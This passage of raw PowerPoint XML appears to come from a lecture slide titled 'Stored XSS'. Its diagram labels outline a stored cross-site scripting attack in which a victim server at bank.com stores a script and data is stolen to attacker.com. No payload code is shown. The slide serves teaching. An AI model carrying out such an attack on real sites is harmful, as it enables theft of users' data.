                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="1904451" y="4678952"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324100" y="2449371"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115752" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5387416" y="2410386"/>
            <a:ext cx="121634" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="3044399" y="2341930"/>
            <a:ext cx="2117141" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>steal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>valuable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="5555" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="5555">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640013" y="2582863"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766509" y="2590165"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="1905000"/>
            <a:ext cx="2301433" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477086" y="2752725"/>
            <a:ext cx="1905" cy="1704339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="1704339">
                <a:moveTo>
                  <a:pt x="1501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1703884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430691" y="4410159"/>
            <a:ext cx="92844" cy="116893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876546" y="2872740"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1148521" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4587240"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092825" y="6449822"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216025" y="1539240"/>
            <a:ext cx="6849109" cy="1041439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4338320">
              <a:lnSpc>
                <a:spcPts val="2390"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="object 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618413" y="5400376"/>
            <a:ext cx="728345" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Stores  the  script!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Title 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F983B134-2ACC-6D40-80E0-FD9CAE37F025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274638"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE399588-6C20-5C44-9DC9-B86514F562B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="41" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085F15C5-6FD4-EC49-96F8-C4F30E761CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1444508970"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1057275" y="2667000"/>
          <a:ext cx="7726045" cy="1731010"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
